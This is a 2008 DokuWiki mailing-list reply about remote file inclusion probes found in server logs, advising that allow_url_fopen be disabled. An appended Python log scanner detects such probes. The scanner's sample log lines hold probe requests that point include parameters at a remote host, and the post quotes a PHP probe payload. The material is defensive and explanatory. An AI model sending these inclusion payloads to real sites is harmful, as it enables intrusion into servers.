[dokuwiki] Re: attempt to use possible vulnerability of dokuwiki
- From: Jonathan Dill <jonathan@xxxxxxxxx>
- To: dokuwiki@xxxxxxxxxxxxx
- Date: Wed, 06 Feb 2008 18:50:32 -0500
Digging back through web log files, there has been a "surge" in this
type of activity lately where the target is the <?php echo
md5("just_a_test");?> but this type of exploit is nothing new.
Here is a decent recent article from CIAC explaining the issues in basic
terms. These attempts appear to be targeting index.php in general, I
found attempts in the logs of several non-dokuwiki sites as well. The
issue is not with dokuwiki, but how you have configured PHP and your web
server, hopefully allow_url_fopen = 'off' and you do not have anything
that requires that capability or try to use cURL instead. Newer PHP
uses a "wrapper" which can be used to restrict what can be included.
http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml
Docs from PHP website:
http://us2.php.net/filesystem
See also:
http://phpsec.org/projects/phpsecinfo/tests/allow_url_fopen.html
Recommendations
You should disable allow_url_fopen in the php.ini file:
; Disable allow_url_fopen for security reasons
allow_url_fopen = 'off'
The setting can also be disabled in Apache's httpd.conf file:
# Disable allow_url_fopen for security reasons
php_flag allow_url_fopen off
For remote file access, consider using the cURL functions that PHP
provides.
Jonathan
--
DokuWiki mailing list - more info at
http://wiki.splitbrain.org/wiki:mailinglist
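The kind of log review Jonathan describes can be scripted. The following is an added example, not code from the mailing list post or from the DokuWiki project: it parses Apache combined-format access log lines and flags requests in which a query-string parameter value is itself an absolute URL, which is the hallmark of a remote file inclusion probe against an include() that allow_url_fopen would let fetch over the network. The log lines, IP addresses and hostnames are constructed for the example; the parameter names (page, _REQUEST[option]) and the helper names are assumptions, not anything taken from a real scanner or from DokuWiki.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Two lines are RFI probes (parameter value is a remote URL); two are ordinary wiki hits.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2008:18:12:01 -0500] "GET /index.php?page=http://198.51.100.9/t.txt? HTTP/1.1" 200 4123 "-" "Mozilla/4.0"
192.0.2.44 - - [06/Feb/2008:18:12:05 -0500] "GET /doku.php?id=start HTTP/1.1" 200 8890 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Feb/2008:18:12:09 -0500] "GET /lib/index.php?_REQUEST[option]=ftp://198.51.100.9/x HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.44 - - [06/Feb/2008:18:13:00 -0500] "GET /doku.php?id=wiki:syntax&do=edit HTTP/1.1" 200 9102 "http://wiki.example/" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# A parameter value that is a complete remote URL is what an include()/require()
# would fetch when allow_url_fopen is on; legitimate wiki parameters never look like this.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Split one access log line into its fields; return None for malformed lines."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_params(target):
    """Return (name, value) pairs from the query string whose value is an absolute URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE_RE.match(v)]


def find_rfi_probes(log_text):
    """Scan a log and return one record per request carrying a remote URL as a parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = remote_params(rec["target"])
        if params:
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "status": rec["status"], "params": params})
    return hits


def probes_by_source(hits):
    """Count probes per client address, to see which sources are scanning."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    probes = find_rfi_probes(SAMPLE_LOG)
    for p in probes:
        print(f'{p["ts"]} {p["ip"]} status={p["status"]} params={p["params"]}')
    print("per source:", probes_by_source(probes))
```

A 200 response to such a probe does not by itself mean the include succeeded (the script may simply have ignored the parameter), but a host that answers these requests with 200 while allow_url_fopen is still on deserves a closer look; with the setting off, as the post recommends, the fetch cannot happen regardless of what the application does with the parameter.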